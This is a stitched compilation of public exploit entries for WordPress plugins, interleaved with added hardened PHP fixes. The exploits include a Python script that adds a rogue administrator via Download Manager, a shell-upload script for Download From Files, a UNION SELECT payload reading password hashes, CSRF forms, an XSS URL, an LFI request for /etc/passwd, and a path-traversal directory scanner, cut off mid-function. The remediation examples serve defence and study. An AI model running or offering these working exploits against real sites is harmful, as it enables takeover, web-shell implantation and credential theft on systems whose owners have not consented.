import urllib, urllib2, socket
# Filesystem checks (used by checkfile)
import os
import sys
# String manipulator
import string, random
# Args management
import optparse

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// protocol')
        sys.exit(1)
    else:
        return url

# Check if file exists and is readable
def checkfile(file):
    if not os.path.isfile(file) or not os.access(file, os.R_OK):
        print('[X] '+file+' file is missing or not readable')
        sys.exit(1)
    else:
        return file

def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

banner = """
    ___ ___               __
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|
   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|
   |:      |    ______      |__|              __                __
   |::.|:. |   |   _  \ .-----.--.--.--.-----|  .-----.---.-.--|  |
   `--- ---'   |.  |   \|  _  |  |  |  |     |  |  _  |  _  |  _  |
               |.  |    |_____|________|__|__|__|_____|___._|_____|
               |:  1    /   ___ ___
               |::.. . /   |   Y   .---.-.-----.---.-.-----.-----.----.
               `------'    |.      |  _  |     |  _  |  _  |  -__|   _|
                           |. \_/  |___._|__|__|___._|___  |_____|__|
                           |:  |   |                 |_____|
                           |::.|:. |
                           `--- ---'
                                                   Wordpress Download Manager
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
                                                          v2.7.0-2.7.4

                               Written by:

                             Claudio Viviani

                          http://www.homelab.it

                             info@homelab.it
                         homelabit@protonmail.ch

                   https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""

commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target:
    print(banner)
    commandList.print_help()
    sys.exit(1)

host = checkurl(options.target)
timeout = options.timeout

print(banner)

socket.setdefaulttimeout(timeout)

username = id_generator()
pwd = id_generator()

body = urllib.urlencode({'action' : 'wpdm_ajax_call',
                         'execute' : 'wp_insert_user',
                         'user_login' : username,
                         'user_pass' : pwd,
                         'role' : 'administrator'})

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

print("[+] Trying to connect to: "+host)
try:
    req = urllib2.Request(host+"/", body, headers)
    response = urllib2.urlopen(req)
    html = response.read()

    if html == "":
       print("[!] Account Added")
       print("[!] Location: "+host+"/wp-login.php")
       print("[!] Username: "+username)
       print("[!] Password: "+pwd)
    else:
       print("[X] Exploitation Failed :(")

except urllib2.HTTPError as e:
    print("[X] "+str(e))
except urllib2.URLError as e:
    print("[X] Connection Error: "+str(e))
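A hardened dispatcher for the call_user_func() pattern quoted in the header comments above, added here and not the plugin's own code. Request text becomes a lookup key into a fixed handler table instead of a callable name, so wp_insert_user (or any other defined function) is unreachable, and the capability and nonce checks the original lacked are added. The handler names and nonce action are assumptions.

```php
<?php
// Added example, not the plugin's own code. Replaces
//   if (function_exists($_POST['execute'])) call_user_func($_POST['execute'], $_POST);
// with a closed dispatch table plus authorization checks.

function wpdm_ajax_call_exec_hardened()
{
    if (!isset($_POST['action']) || $_POST['action'] !== 'wpdm_ajax_call') {
        return;
    }

    // Fixed dispatch table (assumed handler names). The request can only
    // choose among these keys; it can never name a function directly.
    $handlers = array(
        'package_list'  => 'wpdm_handle_package_list',
        'package_stats' => 'wpdm_handle_package_stats',
    );

    $execute = isset($_POST['execute']) ? (string) wp_unslash($_POST['execute']) : '';
    if (!array_key_exists($execute, $handlers)) {
        status_header(400);
        die('unknown operation');
    }

    // Per-operation nonce (assumed action name): the page that issues the
    // call embeds wp_create_nonce('wpdm_ajax_' . $execute) as _wpnonce.
    if (!isset($_POST['_wpnonce']) || !wp_verify_nonce($_POST['_wpnonce'], 'wpdm_ajax_' . $execute)) {
        status_header(403);
        die('bad nonce');
    }

    // The original hook ran for anyone, logged in or not. Require at least a
    // logged-in user; tighten the capability per operation as needed.
    if (!current_user_can('read')) {
        status_header(403);
        die('forbidden');
    }

    // Hand the handler only the fields it is documented to accept, with their
    // types enforced, instead of the whole $_POST array.
    $args = array(
        'package_id' => isset($_POST['package_id']) ? absint($_POST['package_id']) : 0,
    );
    call_user_func($handlers[$execute], $args);
    die();
}
add_action('init', 'wpdm_ajax_call_exec_hardened');
```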
            
# Exploit Title: WordPress Download Manager 2.7.2 Privilege Escalation
# Date: 24-11-2014
# Software Link: https://wordpress.org/plugins/download-manager/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
# CVE: CVE-2014-9260

1. Description
  
Every registered user can update any WordPress option using the basic_settings() function.

function basic_settings()
{
    if (isset($_POST['task']) && $_POST['task'] == 'wdm_save_settings') {

        foreach ($_POST as $optn => $optv) {
            update_option($optn, $optv);
        }
        if (!isset($_POST['__wpdm_login_form'])) delete_option('__wpdm_login_form');

        die('Settings Saved Successfully');
    }
    include('settings/basic.php');
}

http://security.szurek.pl/wordpress-download-manager-272-privilege-escalation.html

2. Proof of Concept

Log in as a standard user (created using wp-login.php?action=register), then:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wdm_settings">
    <input type="hidden" name="task" value="wdm_save_settings">
    <input type="hidden" name="section" value="basic">
    <input type="hidden" name="default_role" value="administrator">
    <input type="submit" value="Hack!">
</form>

After that, create a new user using wp-login.php?action=register. The newly created user will have admin privileges.

3. Solution:
  
Update to version 2.7.3
            
# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5
# Google Dork: inurl:"/wp-content/plugins/download-manager
# Date: 24 may, 2019
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://www.wpdownloadmanager.com/
# Software Link: https://wordpress.org/plugins/download-manager/
# Tested on: Apache/2.2.24 (CentOS)
POC

#1

There is no CSRF nonce check performed in the "POST /wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request.

#Code

<form method="POST" action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting">
  <input type="hidden" name="__wpdm_email_template" value="default.html">
  <input type="hidden" name="__wpdm_email_setting[logo]" value="https://hacker.jpg">
  <input type="hidden" name="__wpdm_email_setting[banner]" value="https://hacker.jpg">
  <input type="hidden" name="__wpdm_email_setting[footer_text]" value="https://malicious-url.com">
  <input type="hidden" name="__wpdm_email_setting[facebook]" value="https://malicious-url.com">
  <input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com">
  <input type="hidden" name="__wpdm_email_setting[youtube]" value="https://malicious-url.com">
  <input type="submit">
</form>

#2

There is no CSRF nonce check performed in the "POST /wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplate&id=default" request.

#Code

<form method="POST" action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplate&id=default">
<input type="hidden" name="id" value="default">
<input type="hidden" name="email_template[subject]" value="forget password">
<input type="hidden" name="email_template[message]" value="aaa">
<input type="hidden" name="email_template[from_name]" value="hacker">
<input type="hidden" name="email_template[from_email]" value="hacker@hacker.com">
<input type="submit">
</form>
            
# Exploit Title: Wordpress Plugin Download From Files 1.48 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/download-from-files
# Date: 10/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/download-from-files/
# Version: <= 1.48
# Tested on: Ubuntu 20.04.1 LTS (x86)

import os.path
from os import path
import json
import requests;
import sys

def print_banner():
	print("Download From Files <= 1.48 - Arbitrary File Upload")
	print("Author -> spacehen (www.github.com/spacehen)")

def print_usage():
	print("Usage: python3 exploit.py [target url] [php file]")
	print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
	response = requests.get(uri)
	raw = response.text

	if ("Sikeres" in raw):
		return True;
	else:
		return False;

def main():

	print_banner()
	if(len(sys.argv) != 3):
		print_usage();
		sys.exit(1);

	base = sys.argv[1]
	file_path = sys.argv[2]

	ajax_action = 'download_from_files_617_fileupload'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	if( path.isfile(file_path) == False):
		print("(*) Invalid file!")
		sys.exit(1)

	files = {'files[]' : open(file_path)}
	data = {
	"allowExt" : "php4,phtml",
	"filesName" : "files",
    "maxSize" : "1000",
    "uploadDir" : "."
	}
	print("Uploading Shell...");
	response = requests.post(uri, files=files, data=data )
	file_name = path.basename(file_path)
	if("ok" in response.text):
		print("Shell Uploaded!")
		if(base[-1] != '/'):
			base += '/'
		print(base + "wp-admin/" + file_name);
	else:
		print("Shell Upload Failed")
		sys.exit(1)

main();
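
A hardened upload handler, as a contrast to the plugin behaviour the script above relies on: there the allowed extensions ("allowExt"), the upload directory and the size limit all arrive in the request, and the endpoint needs no login. This is an added example, not the plugin's own code. It assumes it runs inside WordPress (current_user_can, check_ajax_referer, wp_check_filetype_and_ext, wp_handle_upload and wp_send_json_* are core functions); the action name dff_fileupload, the nonce action and the allowed types are hypothetical.

```php
<?php
// Added example: server-side upload validation for an admin-ajax handler.
// Assumes WordPress is loaded. Action name, nonce action, allowed types and
// the size limit are hypothetical choices for the demonstration.

function dff_fileupload_hardened()
{
    // Authentication and authorisation: the vulnerable endpoint had neither.
    if (!current_user_can('upload_files')) {
        wp_send_json_error('not allowed', 403);
    }
    // CSRF protection: the uploading form must emit wp_nonce_field('dff_fileupload').
    check_ajax_referer('dff_fileupload', '_wpnonce');

    if (!isset($_FILES['file']) || !is_array($_FILES['file'])) {
        wp_send_json_error('no file', 400);
    }
    $file = $_FILES['file'];

    // Server-side allowlist of extension => MIME type. Nothing in the request
    // (no allowExt, uploadDir or maxSize parameter) can widen this list.
    $mimes = [
        'pdf' => 'application/pdf',
        'zip' => 'application/zip',
        'png' => 'image/png',
    ];
    $max_bytes = 5 * 1024 * 1024;   // hypothetical limit

    if ($file['error'] !== UPLOAD_ERR_OK || $file['size'] > $max_bytes) {
        wp_send_json_error('upload rejected', 400);
    }

    // Extension and sniffed content type are checked together: a .php4 or
    // .phtml name fails the allowlist, and a PHP payload renamed to .png fails
    // the content check because it is not a PNG image.
    $check = wp_check_filetype_and_ext($file['tmp_name'], $file['name'], $mimes);
    if (empty($check['ext']) || empty($check['type'])) {
        wp_send_json_error('file type not allowed', 415);
    }

    // Let WordPress move the file into its uploads directory under a
    // sanitised name; never into wp-admin/ or a client-chosen "uploadDir".
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload($file, ['test_form' => false, 'mimes' => $mimes]);
    if (isset($result['error'])) {
        wp_send_json_error($result['error'], 400);
    }
    wp_send_json_success(['url' => $result['url']]);
}

// Registered for logged-in users only: deliberately no wp_ajax_nopriv_ hook,
// so anonymous visitors (the audience of the exploit above) never reach it.
add_action('wp_ajax_dff_fileupload', 'dff_fileupload_hardened');
```

The three checks are independent: even if the capability check were removed, the allowlist still refuses executable extensions, and even if the allowlist were widened, wp_handle_upload still keeps files out of wp-admin/.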
            
# Exploit Title: Double Opt-In for Download 2.0.9 Sql Injection
# Date: 06-06-2016
# Software Link: https://wordpress.org/plugins/double-opt-in-for-download/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description
   
`$_POST['id']` is not escaped.

`populate_download_edit_form()` is accessible for every registered user.

http://security.szurek.pl/double-opt-in-for-download-209-sql-injection.html


2. Proof of Concept

Log in as a regular user.

<form name="xss" action="http://wordpress-url/wp-admin/admin-ajax.php?action=populate_download_edit_form" method="post">
	<input type="text" name="id" value="0 UNION SELECT 1, 2, 4, 5, 6, 7, user_pass FROM wp_users WHERE ID=1">
	<input type="submit" value="Send">
</form>

3. Solution:
   
Update to version 2.1.0
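
A parameterised counterpart to the populate_download_edit_form handler described above, for the two defects the advisory names: the unescaped id and the handler being reachable by every registered user. This is an added example, not the plugin's own code. It assumes WordPress is loaded ($wpdb, current_user_can, check_ajax_referer, absint, wp_send_json_*); the table name doi_downloads, the columns, the capability and the nonce action are hypothetical.

```php
<?php
// Added example: a prepared-statement version of the AJAX handler.
// Assumes WordPress is loaded. Table, columns, capability and nonce action
// are hypothetical.

function doi_populate_download_edit_form_hardened()
{
    global $wpdb;

    // The original handler was reachable by any registered user; editing
    // download entries is an administrative action.
    if (!current_user_can('manage_options')) {
        wp_send_json_error('not allowed', 403);
    }
    check_ajax_referer('doi_edit_download', '_wpnonce');

    // Type coercion first: an id is never text, so the UNION SELECT payload
    // from the PoC collapses to 0 before it gets anywhere near SQL.
    $id = isset($_POST['id']) ? absint($_POST['id']) : 0;
    if ($id === 0) {
        wp_send_json_error('invalid id', 400);
    }

    // Then still go through $wpdb->prepare(): %d is bound as an integer and
    // the query text never contains request-supplied characters. The table
    // name is interpolated, but it comes from $wpdb->prefix, not the request.
    $table = $wpdb->prefix . 'doi_downloads';   // hypothetical table
    $row = $wpdb->get_row(
        $wpdb->prepare("SELECT id, title, file_url FROM {$table} WHERE id = %d", $id),
        ARRAY_A
    );
    if ($row === null) {
        wp_send_json_error('not found', 404);
    }
    wp_send_json_success($row);
}

// Same admin-ajax action the PoC form posts to.
add_action('wp_ajax_populate_download_edit_form', 'doi_populate_download_edit_form_hardened');
```

absint() alone would already neutralise the PoC, but prepare() is what protects the handler when the parameter is later changed to a string (a slug or file name, say), which is the usual way such a fix regresses.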
            
# Exploit Title: WordPress Plugin Domain Check 1.0.16 - Reflected Cross-Site Scripting (XSS) (Authenticated)
# Date: 30-10-2021
# Exploit Author: Ceylan Bozogullarindan
# Author Webpage: https://bozogullarindan.com
# Vendor Homepage: https://domaincheckplugin.com/
# Software Link: https://wordpress.org/plugins/domain-check/
# Version: 1.0.16
# Tested on: Linux
# CVE: CVE-2021-24926 (https://wpscan.com/vulnerability/8cc7cbbd-f74f-4f30-9483-573641fea733)


# Description:

Domain Check is a Wordpress plugin that allows you to see what domains and SSL certificates are coming up for expiration and to quickly locate the coupons, coupon codes, and deals from your favorite sites before renewing.

An authenticated user is able to inject arbitrary JavaScript or HTML code into the "Domain Check Profile" interface available in the settings page of the plugin, due to incorrect sanitization of user-supplied data, and achieve a Reflected Cross-Site Scripting attack against the administrators. The plugin versions prior to 1.0.16 are affected by this vulnerability.


The details of the discovery are given below.


# Steps To Reproduce:
1. Just visit the following page after signing in to the administrator panel: http://vulnerable-wordpress-website/wp-admin/admin.php?page=domain-check-profile&domain=hacked.foo<script>alert(1)</script>
2. The XSS will be triggered on the settings page.
            
# Exploit Title: Wordpress Dharma booking File Inclusion
# Date: 03/22/2016
# Exploit Author: AMAR^SHG
# Vendor Homepage: https://wordpress.org/plugins/dharma-booking/
# Software Link: https://wordpress.org/plugins/dharma-booking/
# Version: <=2.28.3
# Tested on: WINDOWS/WAMP


dharma-booking/frontend/ajax/gateways/proccess.php's code:
<?php
include_once('../../../../../../wp-config.php');
$settings = get_option('Dharma_Vars');
echo $settings['paymentAccount']. $settings['gatewayid'];
require_once($_GET['gateway'].'.php');
//
POC:
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=LFI/RFI
http://localhost/wp/dharma-booking/frontend/ajax/gateways/proccess.php?gateway=../../../../../../etc/passwd%00
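
An allowlisted replacement for the require_once($_GET['gateway'].'.php') line in proccess.php above. This is an added example, not the plugin's own code; the gateway names and the gateways/ directory are hypothetical. It runs stand-alone from the CLI with constructed inputs that mirror the PoC URLs.

```php
<?php
// Added example: resolve a request value to an include path through a fixed
// map instead of concatenating it into the path. Gateway names are hypothetical.

const GATEWAY_DIR = __DIR__ . '/gateways';

// Request value => file name. The request value is only a lookup key; the
// file name that is eventually included never contains request-controlled
// characters, so ../ sequences, NUL bytes and URLs cannot reach require_once.
const GATEWAYS = [
    'paypal' => 'paypal.php',
    'stripe' => 'stripe.php',
];

/** Return the file to include for $requested, or null if it is not a known gateway. */
function resolve_gateway(?string $requested): ?string
{
    if ($requested === null || !array_key_exists($requested, GATEWAYS)) {
        return null;
    }
    return GATEWAY_DIR . '/' . GATEWAYS[$requested];
}

/** What the request handler would do: refuse unknown names, include known ones. */
function load_gateway(?string $requested): void
{
    $path = resolve_gateway($requested);
    if ($path === null || !is_file($path)) {
        http_response_code(400);
        echo "unknown gateway\n";
        return;
    }
    require_once $path;
}

// Constructed inputs: one valid name and the shapes used in the PoC above.
$samples = [
    'paypal',
    '../../../../../../etc/passwd',
    "../../../../../../etc/passwd\0",
    'http://example.com/remote.txt',
];
foreach ($samples as $s) {
    $resolved = resolve_gateway($s);
    printf("%-36s => %s\n", addcslashes($s, "\0"), $resolved ?? 'rejected');
}
```

Only the first sample resolves; the other three are not keys of the map and are rejected without any string inspection, which is why an allowlist is preferable to trying to filter "../" or "http://" out of the value.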
            
# Exploit Title: WordPress Plugin Delightful Downloads Jquery File Tree 1.6.6 - Path Traversal
# Date: 19/03/2021
# Exploit Author: Nicholas Ferreira
# Vendor Homepage: https://github.com/A5hleyRich/delightful-downloads
# Version: <=1.6.6
# Tested on: Debian 11
# CVE : CVE-2017-1000170
# PHP version (exploit): 7.3.27
# POC: curl --data "dir=/etc/" http://example.com/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php

<?php

$vuln_file = "/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"; // do not change

$agents = ["Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.0; Trident/3.0)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X; sl-SI) AppleWebKit/531.37.3 (KHTML, like Gecko) Version/4.0.5 Mobile/8B119 Safari/6531.37.3",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_6_6 rv:6.0) Gecko/20120629 Firefox/35.0",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.1)",
"Mozilla/5.0 (iPad; CPU OS 7_2_2 like Mac OS X; sl-SI) AppleWebKit/531.5.4 (KHTML, like Gecko) Version/3.0.5 Mobile/8B113 Safari/6531.5.4",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0) AppleWebKit/5321 (KHTML, like Gecko) Chrome/37.0.837.0 Mobile Safari/5321",
"Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/535.12.4 (KHTML, like Gecko) Version/5.1 Safari/535.12.4",
"Mozilla/5.0 (iPad; CPU OS 8_1_1 like Mac OS X; en-US) AppleWebKit/531.18.4 (KHTML, like Gecko) Version/4.0.5 Mobile/8B118 Safari/6531.18.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.12.4 (KHTML, like Gecko) Version/4.0.3 Safari/531.12.4",
"Mozilla/5.0 (compatible; MSIE 5.0; Windows 98; Win 9x 4.90; Trident/5.0)",
"Opera/8.98 (Windows NT 5.0; en-US) Presto/2.11.268 Version/10.00",
"Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X; sl-SI) AppleWebKit/534.16.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B111 Safari/6534.16.2",
"Mozilla/5.0 (X11; Linux x86_64; rv:5.0) Gecko/20100107 Firefox/36.0",
"Mozilla/5.0 (Windows; U; Windows CE) AppleWebKit/535.23.6 (KHTML, like Gecko) Version/4.0.2 Safari/535.23.6",
"Mozilla/5.0 (X11; Linux i686; rv:5.0) Gecko/20120805 Firefox/36.0",
"Mozilla/5.0 (X11; Linux x86_64; rv:7.0) Gecko/20130123 Firefox/37.0",
"Mozilla/5.0 (compatible; MSIE 5.0; Windows NT 6.0; Trident/4.1)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_9 rv:6.0) Gecko/20190226 Firefox/36.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.0) AppleWebKit/533.39.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.39.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:4.0) Gecko/20160603 Firefox/37.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_9 rv:5.0; en-US) AppleWebKit/532.20.3 (KHTML, like Gecko) Version/4.0 Safari/532.20.3",
"Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/5340 (KHTML, like Gecko) Chrome/37.0.813.0 Mobile Safari/5340",
"Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
"Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
"Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
"Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
"Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
"Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/5341 (KHTML, like Gecko) Chrome/37.0.831.0 Mobile Safari/5341",
"Opera/9.74 (X11; Linux x86_64; sl-SI) Presto/2.10.265 Version/12.00",
"Opera/9.60 (Windows NT 6.2; en-US) Presto/2.9.333 Version/11.00",
"Mozilla/5.0 (iPad; CPU OS 7_0_2 like Mac OS X; en-US) AppleWebKit/535.7.5 (KHTML, like Gecko) Version/4.0.5 Mobile/8B115 Safari/6535.7.5",
"Mozilla/5.0 (Macintosh; PPC Mac OS X 10_8_2) AppleWebKit/5362 (KHTML, like Gecko) Chrome/40.0.862.0 Mobile Safari/5362",
"Opera/9.74 (Windows NT 5.0; en-US) Presto/2.8.188 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/531.17.1 (KHTML, like Gecko) Version/5.1 Safari/531.17.1",
"Opera/9.93 (Windows CE; sl-SI) Presto/2.12.174 Version/12.00",
"Mozilla/5.0 (Windows; U; Windows 98; Win 9x 4.90) AppleWebKit/535.13.4 (KHTML, like Gecko) Version/4.0.4 Safari/535.13.4",
"Opera/8.19 (X11; Linux i686; en-US) Presto/2.12.301 Version/10.00",
"Mozilla/5.0 (Windows; U; Windows NT 5.2) AppleWebKit/532.7.2 (KHTML, like Gecko) Version/4.0.4 Safari/532.7.2",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 4.0; Trident/3.0)",
"Opera/9.71 (X11; Linux x86_64; en-US) Presto/2.12.270 Version/12.00",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 6.2; Trident/4.1)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_2 rv:4.0) Gecko/20130506 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows 95) AppleWebKit/531.44.7 (KHTML, like Gecko) Version/4.0.4 Safari/531.44.7",
"Mozilla/5.0 (Windows NT 6.1; en-US; rv:1.9.1.20) Gecko/20110731 Firefox/35.0",
"Opera/8.11 (X11; Linux x86_64; en-US) Presto/2.11.165 Version/11.00",
"Mozilla/5.0 (iPad; CPU OS 7_2_1 like Mac OS X; en-US) AppleWebKit/532.33.6 (KHTML, like Gecko) Version/4.0.5 Mobile/8B117 Safari/6532.33.6",
"Opera/9.71 (X11; Linux x86_64; sl-SI) Presto/2.10.180 Version/11.00",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_1 rv:5.0) Gecko/20130122 Firefox/36.0",
"Mozilla/5.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; Trident/3.0)",
"Mozilla/5.0 (compatible; MSIE 10.0; Windows 95; Trident/4.1)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.1)",
"Opera/8.33 (X11; Linux x86_64; en-US) Presto/2.8.320 Version/12.00",
"Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20121221 Firefox/36.0",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_9 rv:4.0) Gecko/20200625 Firefox/35.0",
"Mozilla/5.0 (Windows NT 6.0; sl-SI; rv:1.9.0.20) Gecko/20200505 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows NT 4.0) AppleWebKit/532.44.4 (KHTML, like Gecko) Version/5.0 Safari/532.44.4",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_9 rv:3.0) Gecko/20201229 Firefox/37.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/531.17.6 (KHTML, like Gecko) Version/4.1 Safari/531.17.6",
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/5311 (KHTML, like Gecko) Chrome/38.0.877.0 Mobile Safari/5311",
"Mozilla/5.0 (Windows; U; Windows NT 6.2) AppleWebKit/531.4.3 (KHTML, like Gecko) Version/5.1 Safari/531.4.3",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_0 rv:4.0) Gecko/20140118 Firefox/35.0",
"Mozilla/5.0 (Windows 95) AppleWebKit/5330 (KHTML, like Gecko) Chrome/36.0.847.0 Mobile Safari/5330",
"Opera/8.39 (Windows 98; sl-SI) Presto/2.9.202 Version/11.00",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5 rv:3.0; en-US) AppleWebKit/534.11.4 (KHTML, like Gecko) Version/5.0 Safari/534.11.4"];


function post_request($url, $data, $random_agent = 0){
    global $agents;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_POST, true);
	curl_setopt($ch, CURLOPT_POSTFIELDS, array("dir" => $data));
	#curl_setopt($ch, CURLOPT_PROXY, "127.0.0.1:8080");	//debug w/ burp
	if($random_agent){
		curl_setopt($ch, CURLOPT_USERAGENT, $agents[rand(0,count($agents)-1)]);
	}

    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}

function parse_dir($str){ // by raina77ow =)
  $contents = array();
  $startFrom = $contentStart = $contentEnd = 0;
  while (false !== ($contentStart = strpos($str, 'rel="', $startFrom))){
    $contentStart += 5;
    $contentEnd = strpos($str, '">', $contentStart);
    if (false === $contentEnd){
      break;
    }
    $contents[] = substr($str, $contentStart, $contentEnd - $contentStart);
    $startFrom = $contentEnd + 2;
  }
  return $contents;
}


function list_files($url,$path, $recursive=0,$filter){
	global $vuln_file;
	global $recursive;
	global $random_agent;
	$exts = "";
	$extensions = "";
	$files = "";
	(count($filter) > 0) ? $has_filter = 1 : $has_filter = 0;

	$parsed = parse_dir(post_request($url.$vuln_file, $path, $random_agent)); // array tree

	foreach($parsed as $file_or_folder){
		if($has_filter){
			foreach($filter as $filtered){
				if(strpos($file_or_folder, $filtered) !== false){ //if the current file contains any of the filter
			        echo "  ".$file_or_folder."\n";
			        continue;
				}
				if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
				    if($recursive){ //if recursive flag is set, enter on each folder and do it
				        list_files($url, $file_or_folder, $recursive, $filter);
				    }
				    continue 2; // continue the outermost foreach
				}
			}
		continue; // if has filter, always restart the loop here
		}

		if(preg_match_all("#^\/.*\/$#", $file_or_folder)){ // is a folder
		    if($recursive){ //if recursive flag is set, enter on each folder and do it
		        list_files($url, $file_or_folder, $recursive, $filter);
		    }else{
		        echo "  ".$file_or_folder."\n"; //if it's not to be recursive, just print the folder name
		    }
		}else{ //is a file
		    echo "  ".$file_or_folder."\n";
		}
		continue;
	}
}


function alert_user($target,$path, $recursive, $filter){ //scanning the root of the server recursively can really be a pain
	if($path == "/" && $recursive == 1){
		echo red("  [i] WARNING: Scanning the root of the webserver recursively can
  exceed the timeout limit, block your IP or even take down the server.
  Are you sure you want to continue? [y/N] ");
		$handle = fopen ("php://stdin","r");
		$line = fgets($handle);
		if(trim(strtoupper($line)) != 'Y'){
		    echo "\n  Aborted. Try running me without the recursion flag\n\n";
		    exit;
		}
		fclose($handle);
